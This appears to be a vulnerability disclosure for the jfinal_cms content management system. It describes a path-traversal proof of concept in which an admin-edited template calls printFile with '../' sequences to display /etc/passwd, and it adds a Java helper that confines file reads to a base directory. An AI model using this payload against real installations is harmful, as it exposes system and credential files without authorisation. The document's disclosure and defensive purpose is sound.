Project address:
https://github.com/jflyfox/jfinal_cms
Official website:
http://mtg.jflyfox.com/
Log in to the admin backend and, in template management, edit /template/includes/jquery.html. The PoC is as follows:
${printFile('../../../../../../../../../../../../../../../etc/passwd')}
Reopen the homepage http://localhost:8877/jfinal_cms/ and the contents of /etc/passwd are displayed.
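
One way to confine a template file-read function such as printFile to a single directory, shown as an added example that is not code from jfinal_cms. The class name ConfinedFileReader, the base-directory model and the sample file are assumptions made for illustration.

```java
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;

// Hypothetical helper, not jfinal_cms code: confines a template
// file-read function to one base directory.
public class ConfinedFileReader {
    private final Path base;

    public ConfinedFileReader(Path baseDir) throws IOException {
        // Resolve symlinks once so later comparisons use the real location.
        this.base = baseDir.toRealPath();
    }

    // Returns the file content, or throws SecurityException when the
    // requested name resolves outside the base directory.
    public String read(String requested) throws IOException {
        // An absolute "requested" replaces the base in resolve(), so the
        // startsWith check below rejects it as well.
        Path candidate = base.resolve(requested).normalize();
        if (!candidate.startsWith(base)) {
            throw new SecurityException("path escapes base directory: " + requested);
        }
        // Follow symlinks and re-check, so a link placed inside the base
        // cannot point outside it.
        Path real = candidate.toRealPath();
        if (!real.startsWith(base)) {
            throw new SecurityException("symlink escapes base directory: " + requested);
        }
        return new String(Files.readAllBytes(real), StandardCharsets.UTF_8);
    }

    public static void main(String[] args) throws IOException {
        // Constructed sample: a temporary directory stands in for the template root.
        Path root = Files.createTempDirectory("tpl-root");
        Files.write(root.resolve("footer.html"), "<p>ok</p>".getBytes(StandardCharsets.UTF_8));
        ConfinedFileReader reader = new ConfinedFileReader(root);

        System.out.println(reader.read("footer.html"));
        try {
            reader.read("../../../../../../../../etc/passwd");
        } catch (SecurityException e) {
            System.out.println("blocked: " + e.getMessage());
        }
    }
}
```

Path.startsWith compares whole path elements rather than string prefixes, so a sibling directory whose name merely begins with the base directory's name does not pass the check.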